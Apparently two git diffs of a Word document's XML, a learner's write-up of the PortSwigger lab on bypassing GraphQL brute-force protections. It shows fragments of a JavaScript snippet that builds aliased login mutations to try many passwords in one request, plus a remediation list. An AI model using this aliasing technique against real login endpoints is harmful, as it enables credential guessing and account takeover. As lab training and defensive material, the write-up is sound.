--- a/PortSwigger Labs/Advanced Topics/GraphQL API/Lab 4 - Bypassing GraphQL brute force protections.docx
+++ b/PortSwigger Labs/Advanced Topics/GraphQL API/Lab 4 - Bypassing GraphQL brute force protections.docx
@@ -364,7 +364,17 @@
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>bruteforce$index:login</w:t>
+        <w:t>bruteforce$index:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>login</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -374,7 +384,17 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>(input:{password: "$password", username: "</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>input:{password: "$password", username: "</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -475,14 +495,25 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>`.replaceAll('$index',index).replaceAll('$password',element)).join('\n'));console.log("The query has been copied to your clipboard.");</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>`.replaceAll</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>('$index',index).replaceAll('$password',element)).join('\n'));console.log("The query has been copied to your clipboard.");</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -507,7 +538,27 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">mutation login($input: </w:t>
+        <w:t xml:space="preserve">mutation </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>login(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve">$input: </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -549,7 +600,27 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">        login(input: $input) {</w:t>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>login(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>input: $input) {</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -686,7 +757,26 @@
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:tab/>
-        <w:t>login(input: $input) {</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>login(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>input: $input) {</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -784,6 +874,219 @@
       <w:r>
         <w:br/>
         <w:t>REMEDIATION</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Implement Proper Rate Limiting:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> The rate limiting should not solely be based on the origin IP. Consider more robust methods that combine multiple identifiers (e.g., IP, User-Agent, JWT token, etc.) to make bypassing the rate limiter more difficult.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Account Lockout:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Implement account lockout policies after a certain number of failed login attempts. This will prevent brute-force attacks on specific user accounts.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>CAPTCHA:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Consider integrating CAPTCHA after a certain number of failed login attempts. This can deter automated brute force attacks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Use Secure Tokens:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Use tokens like CSRF tokens to ensure requests are coming from legitimate sources. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>GraphQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mutations can use CSRF tokens to validate requests.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Obscure Error Messages:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Do not provide verbose error messages that give away information about the application’s internal workings or that inform the attacker they have been rate-limited. Instead, use generic error messages.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText2"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Use Adaptive Rate Limiting:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Implement an adaptive rate limiting strategy where the delay increases exponentially with each failed request.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -799,6 +1102,95 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="1E642C8A"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="15E6675C"/>
+    <w:lvl w:ilvl="0" w:tplc="4009000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="4009001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4A7B19EE"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="1ACA07EA"/>
@@ -887,7 +1279,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7A4B6BB1"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="198C97D0"/>
@@ -981,9 +1373,12 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1116676163">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="2" w16cid:durableId="1740515370">
     <w:abstractNumId w:val="1"/>
   </w:num>
-  <w:num w:numId="2" w16cid:durableId="1740515370">
+  <w:num w:numId="3" w16cid:durableId="434205570">
     <w:abstractNumId w:val="0"/>
   </w:num>
 </w:numbering>

--- a/PortSwigger Labs/Advanced Topics/GraphQL API/Lab 4 - Bypassing GraphQL brute force protections.docx
+++ b/PortSwigger Labs/Advanced Topics/GraphQL API/Lab 4 - Bypassing GraphQL brute force protections.docx
@@ -364,17 +364,7 @@
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>bruteforce$index:</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>login</w:t>
+        <w:t>bruteforce$index:login</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -384,17 +374,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>input:{password: "$password", username: "</w:t>
+        <w:t>(input:{password: "$password", username: "</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -495,25 +475,14 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>`.replaceAll</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>('$index',index).replaceAll('$password',element)).join('\n'));console.log("The query has been copied to your clipboard.");</w:t>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>`.replaceAll('$index',index).replaceAll('$password',element)).join('\n'));console.log("The query has been copied to your clipboard.");</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -538,27 +507,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">mutation </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>login(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">$input: </w:t>
+        <w:t xml:space="preserve">mutation login($input: </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -600,27 +549,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>login(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>input: $input) {</w:t>
+        <w:t xml:space="preserve">        login(input: $input) {</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -757,26 +686,7 @@
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>login(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>input: $input) {</w:t>
+        <w:t>login(input: $input) {</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -865,6 +775,64 @@
           <w:szCs w:val="32"/>
         </w:rPr>
         <w:t xml:space="preserve">    }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText2"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyText2"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="04BDE855" wp14:editId="6E43D28B">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="margin">
+              <wp:align>right</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>540385</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="6645910" cy="1212215"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
+            <wp:wrapTopAndBottom/>
+            <wp:docPr id="1183090653" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1183090653" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6645910" cy="1212215"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:t>PROOF OF CONCEPT</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -905,7 +873,17 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve"> The rate limiting should not solely be based on the origin IP. Consider more robust methods that combine multiple identifiers (e.g., IP, User-Agent, JWT token, etc.) to make bypassing the rate limiter more difficult.</w:t>
+        <w:t xml:space="preserve"> The rate limiting should not solely be based on the origin IP. Consider more robust methods that combine </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>multiple identifiers (e.g., IP, User-Agent, JWT token, etc.) to make bypassing the rate limiter more difficult.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -992,7 +970,6 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Use Secure Tokens:</w:t>
       </w:r>
       <w:r>
